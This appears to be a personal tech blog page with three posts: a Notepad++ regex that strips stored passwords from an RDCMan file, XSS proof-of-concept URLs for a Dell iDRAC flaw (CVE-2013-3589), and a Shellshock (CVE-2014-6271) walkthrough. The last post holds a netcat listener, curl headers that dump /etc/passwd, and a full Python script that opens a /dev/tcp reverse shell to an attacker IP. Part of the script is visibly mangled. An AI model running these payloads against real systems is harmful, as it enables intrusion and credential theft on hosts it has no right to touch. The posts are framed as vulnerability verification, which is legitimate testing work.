I recently upgraded Remote Desktop Connection Manager (RDCMan) 2.2 to version 2.7. When I open the .rdg file, I get this giant popup window:
Because the file has so many hosts with encrypted password, the size of the error window exceed the screen. I couldn’t even get to the “ok” button.
To fix this issue, we can remove the <password> </password> pair from the .rdg file.
1) You may want to backup it, actually you should make a copy before open the .rdg file with version 2.7.
2) Open the .rdg file with Notepad++. Press ctrl+h to open the “Replace” popup window.
---Find what:<password>.*</password>
---Replace with: null
---Search mode: Regular expression
3) Click “Replace All” button and save the file.
4) Open it with RDCMan 2.7. no popup window anymore.
However, you will have to re-enter your password for these hosts.
Saturday, July 25, 2015
Thursday, March 19, 2015
How to verify CVE-2013-3589 (Dell iDRAC 6 and iDRAC 7 XSS Vulnerability)
1. Nessus description:
The remote Dell Remote Access Controller (iDRAC6 / iDRAC7)
is affected by a cross-site scripting vulnerability. The login page does not
properly sanitize user-supplied input to the 'ErrorMsg' parameter. An attacker
could leverage this to inject arbitrary HTML and script code into a user's
browser to be executed within the security context of the affected site.
2. Demonstration:
2) Example 1: pop up a javascript window.
https://192.168.xxx.xxx/login.html?ErrorMsg=%3Cimg%20src=asdf%20onerror=alert%28%22XSS%22%29%3E
3) Example 2: redirect to https://google.com
https://192.168.xxx.xxx/login.html?ErrorMsg="><img src=x onerror=window.open('https://google.com/');>
1) Upgrade to firmware version 1.96 (iDRAC6) /
1.46.45 (iDRAC7) or later.
1). http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3589
2). http://www.tenable.com/plugins/index.php?view=single&id=70411
3. Recommendation
4. References:
2). http://www.tenable.com/plugins/index.php?view=single&id=70411
Monday, October 20, 2014
How to get reverse shell with BASH (shellshock) vulnerability?
Pre-require:
1. Kali Linux
3. If you are trying to attack an https site, change line 12 to conn = httplib.HTTPSConnection(sys.argv[1]), here I save it as “shellshocks.py”
4. Your Kali Linux IP
5. The vulnerable host IP
Steps
1. Run command “nc –lvp 9999”, listening on port 9999, you can change the port number if you want.
2. Open another window and run command “python shellshocks.py 10.10.x.x /ucsm/isSamInstalled.cgi 172.16.x.x/9999”. 10.10.x.x is the vulnerable host. 172.16.x.x is my Kali Linux IP.
3. Now you can get the shell:
Some commands that can be used to verify Shellshock:
1. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" https://10.10.x.x/ucsm/isSamInstalled.cgi
2. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/cat /etc/passwd" https://10.10.x.x/ucsm/isSamInstalled.cgi
3. curl --insecure -A "X: () { :;}; echo; /bin/cat /etc/passwd; 2>&1; exit" https://10.10.x.x/ucsm/isSamInstalled.cgi
Appendix: the source code (from http://pastebin.com/166f8Rjx)
#
#CVE-2014-6271 cgi-bin reverse shell
#
import httplib,urllib,sys
if (len(sys.argv)<4 br=""> print "Usage: %s
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
exit(0)
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
headers = {"Content-type": "application/x-www-form-urlencoded",
"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
Subscribe to:
Posts (Atom)